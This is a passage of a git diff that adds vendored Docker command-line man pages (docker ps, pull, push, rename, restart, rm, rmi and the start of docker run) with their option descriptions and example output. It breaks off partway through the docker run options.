+   - health=(starting|healthy|unhealthy|none) - filters containers based on healthcheck status
+
+**--format**="*TEMPLATE*"
+   Pretty-print containers using a Go template.
+   Valid placeholders:
+      .ID - Container ID
+      .Image - Image ID
+      .Command - Quoted command
+      .CreatedAt - Time when the container was created.
+      .RunningFor - Elapsed time since the container was started.
+      .Ports - Exposed ports.
+      .Status - Container status.
+      .Size - Container disk size.
+      .Names - Container names.
+      .Labels - All labels assigned to the container.
+      .Label - Value of a specific label for this container. For example `{{.Label "com.docker.swarm.cpu"}}`
+      .Mounts - Names of the volumes mounted in this container.
+
+**--help**
+  Print usage statement
+
+**-l**, **--latest**=*true*|*false*
+   Show only the latest created container (includes all states). The default is *false*.
+
+**-n**=*-1*
+   Show n last created containers (includes all states).
+
+**--no-trunc**=*true*|*false*
+   Don't truncate output. The default is *false*.
+
+**-q**, **--quiet**=*true*|*false*
+   Only display numeric IDs. The default is *false*.
+
+**-s**, **--size**=*true*|*false*
+   Display total file sizes. The default is *false*.
+
+# EXAMPLES
+# Display all containers, including non-running
+
+    # docker ps -a
+    CONTAINER ID        IMAGE                 COMMAND                CREATED             STATUS      PORTS    NAMES
+    a87ecb4f327c        fedora:20             /bin/sh -c #(nop) MA   20 minutes ago      Exit 0               desperate_brattain
+    01946d9d34d8        vpavlin/rhel7:latest  /bin/sh -c #(nop) MA   33 minutes ago      Exit 0               thirsty_bell
+    c1d3b0166030        acffc0358b9e          /bin/sh -c yum -y up   2 weeks ago         Exit 1               determined_torvalds
+    41d50ecd2f57        fedora:20             /bin/sh -c #(nop) MA   2 weeks ago         Exit 0               drunk_pike
+
+# Display only IDs of all containers, including non-running
+
+    # docker ps -a -q
+    a87ecb4f327c
+    01946d9d34d8
+    c1d3b0166030
+    41d50ecd2f57
+
+# Display only IDs of all containers that have the name `determined_torvalds`
+
+    # docker ps -a -q --filter=name=determined_torvalds
+    c1d3b0166030
+
+# Display containers with their commands
+
+    # docker ps --format "{{.ID}}: {{.Command}}"
+    a87ecb4f327c: /bin/sh -c #(nop) MA
+    01946d9d34d8: /bin/sh -c #(nop) MA
+    c1d3b0166030: /bin/sh -c yum -y up
+    41d50ecd2f57: /bin/sh -c #(nop) MA
+
+# Display containers with their labels in a table
+
+    # docker ps --format "table {{.ID}}\t{{.Labels}}"
+    CONTAINER ID        LABELS
+    a87ecb4f327c        com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd
+    01946d9d34d8
+    c1d3b0166030        com.docker.swarm.node=debian,com.docker.swarm.cpu=6
+    41d50ecd2f57        com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd
+
+# Display containers with their node label in a table
+
+    # docker ps --format 'table {{.ID}}\t{{(.Label "com.docker.swarm.node")}}'
+    CONTAINER ID        NODE
+    a87ecb4f327c        ubuntu
+    01946d9d34d8
+    c1d3b0166030        debian
+    41d50ecd2f57        fedora
+
+# Display containers with `remote-volume` mounted
+
+    $ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}"
+    CONTAINER ID        MOUNTS
+    9c3527ed70ce        remote-volume
+
+# Display containers with a volume mounted in `/data`
+
+    $ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}"
+    CONTAINER ID        MOUNTS
+    9c3527ed70ce        remote-volume
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+February 2015, updated by André Martins <martins@noironetworks.com>
+October 2016, updated by Josh Horwitz <horwitzja@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-pull.1.md b/vendor/github.com/docker/docker/man/docker-pull.1.md
new file mode 100644
index 0000000000..c61d005308
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-pull.1.md
@@ -0,0 +1,220 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-pull - Pull an image or a repository from a registry
+
+# SYNOPSIS
+**docker pull**
+[**-a**|**--all-tags**]
+[**--help**] 
+NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG]
+
+# DESCRIPTION
+
+This command pulls down an image or a repository from a registry. If
+there is more than one image for a repository (e.g., fedora) then all
+images for that repository name can be pulled down including any tags
+(see the option **-a** or **--all-tags**).
+
+If you do not specify a `REGISTRY_HOST`, the command uses Docker's public
+registry located at `registry-1.docker.io` by default. 
+
+# OPTIONS
+**-a**, **--all-tags**=*true*|*false*
+   Download all tagged images in the repository. The default is *false*.
+
+**--help**
+  Print usage statement
+
+# EXAMPLES
+
+### Pull an image from Docker Hub
+
+To download a particular image, or set of images (i.e., a repository), use
+`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a
+default. This command pulls the `debian:latest` image:
+
+    $ docker pull debian
+
+    Using default tag: latest
+    latest: Pulling from library/debian
+    fdd5d7827f33: Pull complete
+    a3ed95caeb02: Pull complete
+    Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa
+    Status: Downloaded newer image for debian:latest
+
+Docker images can consist of multiple layers. In the example above, the image
+consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`.
+
+Layers can be reused by images. For example, the `debian:jessie` image shares
+both layers with `debian:latest`. Pulling the `debian:jessie` image therefore
+only pulls its metadata, but not its layers, because all layers are already
+present locally:
+
+    $ docker pull debian:jessie
+
+    jessie: Pulling from library/debian
+    fdd5d7827f33: Already exists
+    a3ed95caeb02: Already exists
+    Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e
+    Status: Downloaded newer image for debian:jessie
+
+To see which images are present locally, use the **docker-images(1)**
+command:
+
+    $ docker images
+
+    REPOSITORY   TAG      IMAGE ID        CREATED      SIZE
+    debian       jessie   f50f9524513f    5 days ago   125.1 MB
+    debian       latest   f50f9524513f    5 days ago   125.1 MB
+
+Docker uses a content-addressable image store, and the image ID is a SHA256
+digest covering the image's configuration and layers. In the example above,
+`debian:jessie` and `debian:latest` have the same image ID because they are
+actually the *same* image tagged with different names. Because they are the
+same image, their layers are stored only once and do not consume extra disk
+space.
+
+For more information about images, layers, and the content-addressable store,
+refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/)
+in the online documentation.
+
+
+## Pull an image by digest (immutable identifier)
+
+So far, you've pulled images by their name (and "tag"). Using names and tags is
+a convenient way to work with images. When using tags, you can `docker pull` an
+image again to make sure you have the most up-to-date version of that image.
+For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu
+14.04 image.
+
+In some cases you don't want images to be updated to newer versions, but prefer
+to use a fixed version of an image. Docker enables you to pull an image by its
+*digest*. When pulling an image by digest, you specify *exactly* which version
+of an image to pull. Doing so, allows you to "pin" an image to that version,
+and guarantee that the image you're using is always the same.
+
+To know the digest of an image, pull the image first. Let's pull the latest
+`ubuntu:14.04` image from Docker Hub:
+
+    $ docker pull ubuntu:14.04
+
+    14.04: Pulling from library/ubuntu
+    5a132a7e7af1: Pull complete
+    fd2731e4c50c: Pull complete
+    28a2f68d1120: Pull complete
+    a3ed95caeb02: Pull complete
+    Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+    Status: Downloaded newer image for ubuntu:14.04
+
+Docker prints the digest of the image after the pull has finished. In the example
+above, the digest of the image is:
+
+    sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+
+Docker also prints the digest of an image when *pushing* to a registry. This
+may be useful if you want to pin to a version of the image you just pushed.
+
+A digest takes the place of the tag when pulling an image, for example, to 
+pull the above image by digest, run the following command:
+
+    $ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+
+    sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu
+    5a132a7e7af1: Already exists
+    fd2731e4c50c: Already exists
+    28a2f68d1120: Already exists
+    a3ed95caeb02: Already exists
+    Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+    Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+
+Digest can also be used in the `FROM` of a Dockerfile, for example:
+
+    FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
+    MAINTAINER some maintainer <maintainer@example.com>
+
+> **Note**: Using this feature "pins" an image to a specific version in time.
+> Docker will therefore not pull updated versions of an image, which may include 
+> security updates. If you want to pull an updated image, you need to change the
+> digest accordingly.
+
+## Pulling from a different registry
+
+By default, `docker pull` pulls images from Docker Hub. It is also possible to
+manually specify the path of a registry to pull from. For example, if you have
+set up a local registry, you can specify its path to pull from it. A registry
+path is similar to a URL, but does not contain a protocol specifier (`https://`).
+
+The following command pulls the `testing/test-image` image from a local registry
+listening on port 5000 (`myregistry.local:5000`):
+
+    $ docker pull myregistry.local:5000/testing/test-image
+
+Registry credentials are managed by **docker-login(1)**.
+
+Docker uses the `https://` protocol to communicate with a registry, unless the
+registry is allowed to be accessed over an insecure connection. Refer to the
+[insecure registries](https://docs.docker.com/engine/reference/commandline/daemon/#insecure-registries)
+section in the online documentation for more information.
+
+
+## Pull a repository with multiple images
+
+By default, `docker pull` pulls a *single* image from the registry. A repository
+can contain multiple images. To pull all images from a repository, provide the
+`-a` (or `--all-tags`) option when using `docker pull`.
+
+This command pulls all images from the `fedora` repository:
+
+    $ docker pull --all-tags fedora
+
+    Pulling repository fedora
+    ad57ef8d78d7: Download complete
+    105182bb5e8b: Download complete
+    511136ea3c5a: Download complete
+    73bd853d2ea5: Download complete
+    ....
+
+    Status: Downloaded newer image for fedora
+
+After the pull has completed use the `docker images` command to see the
+images that were pulled. The example below shows all the `fedora` images
+that are present locally:
+
+    $ docker images fedora
+
+    REPOSITORY   TAG         IMAGE ID        CREATED      SIZE
+    fedora       rawhide     ad57ef8d78d7    5 days ago   359.3 MB
+    fedora       20          105182bb5e8b    5 days ago   372.7 MB
+    fedora       heisenbug   105182bb5e8b    5 days ago   372.7 MB
+    fedora       latest      105182bb5e8b    5 days ago   372.7 MB
+
+
+## Canceling a pull
+
+Killing the `docker pull` process, for example by pressing `CTRL-c` while it is
+running in a terminal, will terminate the pull operation.
+
+    $ docker pull fedora
+
+    Using default tag: latest
+    latest: Pulling from library/fedora
+    a3ed95caeb02: Pulling fs layer
+    236608c7b546: Pulling fs layer
+    ^C
+
+> **Note**: Technically, the Engine terminates a pull operation when the
+> connection between the Docker Engine daemon and the Docker Engine client
+> initiating the pull is lost. If the connection with the Engine daemon is
+> lost for other reasons than a manual interaction, the pull is also aborted.
+
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by John Willis <john.willis@docker.com>
+April 2015, updated by Mary Anthony for v2 <mary@docker.com>
+September 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-push.1.md b/vendor/github.com/docker/docker/man/docker-push.1.md
new file mode 100644
index 0000000000..847e66d2e4
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-push.1.md
@@ -0,0 +1,63 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-push - Push an image or a repository to a registry
+
+# SYNOPSIS
+**docker push**
+[**--help**]
+NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG]
+
+# DESCRIPTION
+
+Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com)
+registry or to a self-hosted one.
+
+Refer to **docker-tag(1)** for more information about valid image and tag names.
+
+Killing the **docker push** process, for example by pressing **CTRL-c** while it
+is running in a terminal, terminates the push operation.
+
+Registry credentials are managed by **docker-login(1)**.
+
+
+# OPTIONS
+
+**--disable-content-trust**
+  Skip image verification (default true)
+
+**--help**
+  Print usage statement
+
+# EXAMPLES
+
+## Pushing a new image to a registry
+
+First save the new image by finding the container ID (using **docker ps**)
+and then committing it to a new image name.  Note that only a-z0-9-_. are
+allowed when naming images:
+
+    # docker commit c16378f943fe rhel-httpd
+
+Now, push the image to the registry using the image ID. In this example the
+registry is on host named `registry-host` and listening on port `5000`. To do
+this, tag the image with the host name or IP address, and the port of the
+registry:
+
+    # docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd
+    # docker push registry-host:5000/myadmin/rhel-httpd
+
+Check that this worked by running:
+
+    # docker images
+
+You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd`
+listed.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Mary Anthony for v2 <mary@docker.com>
+June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-rename.1.md b/vendor/github.com/docker/docker/man/docker-rename.1.md
new file mode 100644
index 0000000000..eaeea5c6e0
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-rename.1.md
@@ -0,0 +1,15 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% OCTOBER 2014
+# NAME
+docker-rename - Rename a container
+
+# SYNOPSIS
+**docker rename**
+CONTAINER NEW_NAME
+
+# OPTIONS
+There are no available options.
+
+# DESCRIPTION
+Rename a container.  Container may be running, paused or stopped.
diff --git a/vendor/github.com/docker/docker/man/docker-restart.1.md b/vendor/github.com/docker/docker/man/docker-restart.1.md
new file mode 100644
index 0000000000..271c4eee1b
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-restart.1.md
@@ -0,0 +1,26 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-restart - Restart one or more containers
+
+# SYNOPSIS
+**docker restart**
+[**--help**]
+[**-t**|**--time**[=*10*]]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+Restart each container listed.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-t**, **--time**=*10*
+   Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-rm.1.md b/vendor/github.com/docker/docker/man/docker-rm.1.md
new file mode 100644
index 0000000000..2105288d0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-rm.1.md
@@ -0,0 +1,72 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-rm - Remove one or more containers
+
+# SYNOPSIS
+**docker rm**
+[**-f**|**--force**]
+[**-l**|**--link**]
+[**-v**|**--volumes**]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+
+**docker rm** will remove one or more containers from the host node. The
+container name or ID can be used. This does not remove images. You cannot
+remove a running container unless you use the **-f** option. To see all
+containers on a host use the **docker ps -a** command.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-f**, **--force**=*true*|*false*
+   Force the removal of a running container (uses SIGKILL). The default is *false*.
+
+**-l**, **--link**=*true*|*false*
+   Remove the specified link and not the underlying container. The default is *false*.
+
+**-v**, **--volumes**=*true*|*false*
+   Remove the volumes associated with the container. The default is *false*.
+
+# EXAMPLES
+
+## Removing a container using its ID
+
+To remove a container using its ID, find either from a **docker ps -a**
+command, or use the ID returned from the **docker run** command, or retrieve
+it from a file used to store it using the **docker run --cidfile**:
+
+    docker rm abebf7571666
+
+## Removing a container using the container name
+
+The name of the container can be found using the **docker ps -a**
+command. The use that name as follows:
+
+    docker rm hopeful_morse
+
+## Removing a container and all associated volumes
+
+    $ docker rm -v redis
+    redis
+
+This command will remove the container and any volumes associated with it.
+Note that if a volume was specified with a name, it will not be removed.
+
+    $ docker create -v awesome:/foo -v /bar --name hello redis
+    hello
+    $ docker rm -v hello
+
+In this example, the volume for `/foo` will remain in tact, but the volume for
+`/bar` will be removed. The same behavior holds for volumes inherited with
+`--volumes-from`.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-rmi.1.md b/vendor/github.com/docker/docker/man/docker-rmi.1.md
new file mode 100644
index 0000000000..35bf8aac6a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-rmi.1.md
@@ -0,0 +1,42 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-rmi - Remove one or more images
+
+# SYNOPSIS
+**docker rmi**
+[**-f**|**--force**]
+[**--help**]
+[**--no-prune**]
+IMAGE [IMAGE...]
+
+# DESCRIPTION
+
+Removes one or more images from the host node. This does not remove images from
+a registry. You cannot remove an image of a running container unless you use the
+**-f** option. To see all images on a host use the **docker images** command.
+
+# OPTIONS
+**-f**, **--force**=*true*|*false*
+   Force removal of the image. The default is *false*.
+
+**--help**
+  Print usage statement
+
+**--no-prune**=*true*|*false*
+   Do not delete untagged parents. The default is *false*.
+
+# EXAMPLES
+
+## Removing an image
+
+Here is an example of removing an image:
+
+    docker rmi fedora/httpd
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Mary Anthony for v2 <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-run.1.md b/vendor/github.com/docker/docker/man/docker-run.1.md
new file mode 100644
index 0000000000..8c1018a1e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-run.1.md
@@ -0,0 +1,1055 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-run - Run a command in a new container
+
+# SYNOPSIS
+**docker run**
+[**-a**|**--attach**[=*[]*]]
+[**--add-host**[=*[]*]]
+[**--blkio-weight**[=*[BLKIO-WEIGHT]*]]
+[**--blkio-weight-device**[=*[]*]]
+[**--cpu-shares**[=*0*]]
+[**--cap-add**[=*[]*]]
+[**--cap-drop**[=*[]*]]
+[**--cgroup-parent**[=*CGROUP-PATH*]]
+[**--cidfile**[=*CIDFILE*]]
+[**--cpu-count**[=*0*]]
+[**--cpu-percent**[=*0*]]
+[**--cpu-period**[=*0*]]
+[**--cpu-quota**[=*0*]]
+[**--cpu-rt-period**[=*0*]]
+[**--cpu-rt-runtime**[=*0*]]
+[**--cpus**[=*0.0*]]
+[**--cpuset-cpus**[=*CPUSET-CPUS*]]
+[**--cpuset-mems**[=*CPUSET-MEMS*]]
+[**-d**|**--detach**]
+[**--detach-keys**[=*[]*]]
+[**--device**[=*[]*]]
+[**--device-read-bps**[=*[]*]]
+[**--device-read-iops**[=*[]*]]
+[**--device-write-bps**[=*[]*]]
+[**--device-write-iops**[=*[]*]]
+[**--dns**[=*[]*]]
+[**--dns-option**[=*[]*]]
+[**--dns-search**[=*[]*]]
+[**-e**|**--env**[=*[]*]]
+[**--entrypoint**[=*ENTRYPOINT*]]
+[**--env-file**[=*[]*]]
+[**--expose**[=*[]*]]
+[**--group-add**[=*[]*]]
+[**-h**|**--hostname**[=*HOSTNAME*]]
+[**--help**]
+[**--init**]
+[**--init-path**[=*[]*]]
+[**-i**|**--interactive**]
+[**--ip**[=*IPv4-ADDRESS*]]
+[**--ip6**[=*IPv6-ADDRESS*]]
+[**--ipc**[=*IPC*]]
+[**--isolation**[=*default*]]
+[**--kernel-memory**[=*KERNEL-MEMORY*]]
+[**-l**|**--label**[=*[]*]]
+[**--label-file**[=*[]*]]
+[**--link**[=*[]*]]
+[**--link-local-ip**[=*[]*]]
+[**--log-driver**[=*[]*]]
+[**--log-opt**[=*[]*]]
+[**-m**|**--memory**[=*MEMORY*]]
+[**--mac-address**[=*MAC-ADDRESS*]]
+[**--memory-reservation**[=*MEMORY-RESERVATION*]]
+[**--memory-swap**[=*LIMIT*]]
+[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]]
+[**--name**[=*NAME*]]
+[**--network-alias**[=*[]*]]
+[**--network**[=*"bridge"*]]
+[**--oom-kill-disable**]
+[**--oom-score-adj**[=*0*]]
+[**-P**|**--publish-all**]
+[**-p**|**--publish**[=*[]*]]
+[**--pid**[=*[PID]*]]
+[**--userns**[=*[]*]]
+[**--pids-limit**[=*PIDS_LIMIT*]]
+[**--privileged**]
+[**--read-only**]
+[**--restart**[=*RESTART*]]
+[**--rm**]
+[**--security-opt**[=*[]*]]
+[**--storage-opt**[=*[]*]]
+[**--stop-signal**[=*SIGNAL*]]
+[**--stop-timeout**[=*TIMEOUT*]]
+[**--shm-size**[=*[]*]]
+[**--sig-proxy**[=*true*]]
+[**--sysctl**[=*[]*]]
+[**-t**|**--tty**]
+[**--tmpfs**[=*[CONTAINER-DIR[:<OPTIONS>]*]]
+[**-u**|**--user**[=*USER*]]
+[**--ulimit**[=*[]*]]
+[**--uts**[=*[]*]]
+[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]]
+[**--volume-driver**[=*DRIVER*]]
+[**--volumes-from**[=*[]*]]
+[**-w**|**--workdir**[=*WORKDIR*]]
+IMAGE [COMMAND] [ARG...]
+
+# DESCRIPTION
+
+Run a process in a new container. **docker run** starts a process with its own
+file system, its own networking, and its own isolated process tree. The IMAGE
+which starts the process may define defaults related to the process that will be
+run in the container, the networking to expose, and more, but **docker run**
+gives final control to the operator or administrator who starts the container
+from the image. For that reason **docker run** has more options than any other
+Docker command.
+
+If the IMAGE is not already loaded then **docker run** will pull the IMAGE, and
+all image dependencies, from the repository in the same way running **docker
+pull** IMAGE, before it starts the container from that image.
+
+# OPTIONS
+**-a**, **--attach**=[]
+   Attach to STDIN, STDOUT or STDERR.
+
+   In foreground mode (the default when **-d**
+is not specified), **docker run** can start the process in the container
+and attach the console to the process's standard input, output, and standard
+error. It can even pretend to be a TTY (this is what most commandline
+executables expect) and pass along signals. The **-a** option can be set for
+each of stdin, stdout, and stderr.
+
+**--add-host**=[]
+   Add a custom host-to-IP mapping (host:ip)
+
+   Add a line to /etc/hosts. The format is hostname:ip.  The **--add-host**
+option can be set multiple times.
+
+**--blkio-weight**=*0*
+   Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+
+**--blkio-weight-device**=[]
+   Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`).
+
+**--cpu-shares**=*0*
+   CPU shares (relative weight)
+
+   By default, all containers get the same proportion of CPU cycles. This proportion
+can be modified by changing the container's CPU share weighting relative
+to the weighting of all other running containers.
+
+To modify the proportion from the default of 1024, use the **--cpu-shares**
+flag to set the weighting to 2 or higher.
+
+The proportion will only apply when CPU-intensive processes are running.
+When tasks in one container are idle, other containers can use the
+left-over CPU time. The actual amount of CPU time will vary depending on
+the number of containers running on the system.
+
+For example, consider three containers, one has a cpu-share of 1024 and
+two others have a cpu-share setting of 512. When processes in all three
+containers attempt to use 100% of CPU, the first container would receive
+50% of the total CPU time. If you add a fourth container with a cpu-share
+of 1024, the first container only gets 33% of the CPU. The remaining containers
+receive 16.5%, 16.5% and 33% of the CPU.
+
+On a multi-core system, the shares of CPU time are distributed over all CPU
+cores. Even if a container is limited to less than 100% of CPU time, it can
+use 100% of each individual CPU core.
+
+For example, consider a system with more than three cores. If you start one
+container **{C0}** with **-c=512** running one process, and another container
+**{C1}** with **-c=1024** running two processes, this can result in the following
+division of CPU shares:
+
+    PID    container	CPU	CPU share
+    100    {C0}		0	100% of CPU0
+    101    {C1}		1	100% of CPU1
+    102    {C1}		2	100% of CPU2
+
+**--cap-add**=[]
+   Add Linux capabilities
+
+**--cap-drop**=[]
+   Drop Linux capabilities
+
+**--cgroup-parent**=""
+   Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist.
+
+**--cidfile**=""
+   Write the container ID to the file
+
+**--cpu-count**=*0*
+    Limit the number of CPUs available for execution by the container.
+    
+    On Windows Server containers, this is approximated as a percentage of total CPU usage.
+
+    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
+
+**--cpu-percent**=*0*
+    Limit the percentage of CPU available for execution by a container running on a Windows daemon.
+
+    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
+
+**--cpu-period**=*0*
+   Limit the CPU CFS (Completely Fair Scheduler) period
+
+   Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify.
+
+**--cpuset-cpus**=""
+   CPUs in which to allow execution (0-3, 0,1)
+
+**--cpuset-mems**=""
+   Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+
+   If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1`
+then processes in your Docker container will only use memory from the first
+two memory nodes.
+
+**--cpu-quota**=*0*
+   Limit the CPU CFS (Completely Fair Scheduler) quota
+
+   Limit the container's CPU usage. By default, containers run with the full
+CPU resource. This flag tell the kernel to restrict the container's CPU usage
+to the quota you specify.
+
+**--cpu-rt-period**=0
+   Limit the CPU real-time period in microseconds
+
+   Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify.
+
+**--cpu-rt-runtime**=0
+   Limit the CPU real-time runtime in microseconds
+
+   Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
+   Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
+
+   The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
+
+**--cpus**=0.0
+   Number of CPUs. The default is *0.0* which means no limit.
+
+**-d**, **--detach**=*true*|*false*
+   Detached mode: run the container in the background and print the new container ID. The default is *false*.
+
+   At any time you can run **docker ps** in
+the other shell to view a list of the running containers. You can reattach to a
+detached container with **docker attach**. If you choose to run a container in
+the detached mode, then you cannot use the **-rm** option.
+
+   When attached in the tty mode, you can detach from the container (and leave it
+running) using a configurable key sequence. The default sequence is `CTRL-p CTRL-q`.
+You configure the key sequence using the **--detach-keys** option or a configuration file.
+See **config-json(5)** for documentation on using a configuration file.
+
+**--detach-keys**=""
+   Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**--device**=[]
+   Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)
+
+**--device-read-bps**=[]
+   Limit read rate from a device (e.g. --device-read-bps=/dev/sda:1mb)
+
+**--device-read-iops**=[]
+   Limit read rate from a device (e.g. --device-read-iops=/dev/sda:1000)
+
+**--device-write-bps**=[]
+   Limit write rate to a device (e.g. --device-write-bps=/dev/sda:1mb)
+
+**--device-write-iops**=[]
+   Limit write rate to a device (e.g. --device-write-iops=/dev/sda:1000)
+
+**--dns-search**=[]
+   Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)
+
+**--dns-option**=[]
+   Set custom DNS options
+
+**--dns**=[]
+   Set custom DNS servers
+
+   This option can be used to override the DNS
+configuration passed to the container. Typically this is necessary when the
+host DNS configuration is invalid for the container (e.g., 127.0.0.1). When this
+is the case the **--dns** flags is necessary for every run.
+
+**-e**, **--env**=[]
+   Set environment variables
+
+   This option allows you to specify arbitrary
+environment variables that are available for the process that will be launched
+inside of the container.
+
+**--entrypoint**=""
+   Overwrite the default ENTRYPOINT of the image
+
+   This option allows you to overwrite the default entrypoint of the image that
+is set in the Dockerfile. The ENTRYPOINT of an image is similar to a COMMAND
+because it specifies what executable to run when the container starts, but it is
+(purposely) more difficult to override. The ENTRYPOINT gives a container its
+default nature or behavior, so that when you set an ENTRYPOINT you can run the
+container as if it were that binary, complete with default options, and you can
+pass in more options via the COMMAND. But, sometimes an operator may want to run
+something else inside the container, so you can override the default ENTRYPOINT
+at runtime by using a **--entrypoint** and a string to specify the new
+ENTRYPOINT.
+
+**--env-file**=[]
+   Read in a line delimited file of environment variables
+
+**--expose**=[]
+   Expose a port, or a range of ports (e.g. --expose=3300-3310) informs Docker
+that the container listens on the specified network ports at runtime. Docker
+uses this information to interconnect containers using links and to set up port
+redirection on the host system.
+
+**--group-add**=[]
+   Add additional groups to run as
+
+**-h**, **--hostname**=""
+   Container host name
+
+   Sets the container host name that is available inside the container.
+
+**--help**
+   Print usage statement
+
+**--init**
+   Run an init inside the container that forwards signals and reaps processes
+
+**--init-path**=""
+   Path to the docker-init binary
+
+**-i**, **--interactive**=*true*|*false*
+   Keep STDIN open even if not attached. The default is *false*.
+
+   When set to true, keep stdin open even if not attached. The default is false.
+
+**--ip**=""
+   Sets the container's interface IPv4 address (e.g. 172.23.0.9)
+
+   It can only be used in conjunction with **--network** for user-defined networks
+
+**--ip6**=""
+   Sets the container's interface IPv6 address (e.g. 2001:db8::1b99)
+
+   It can only be used in conjunction with **--network** for user-defined networks
+
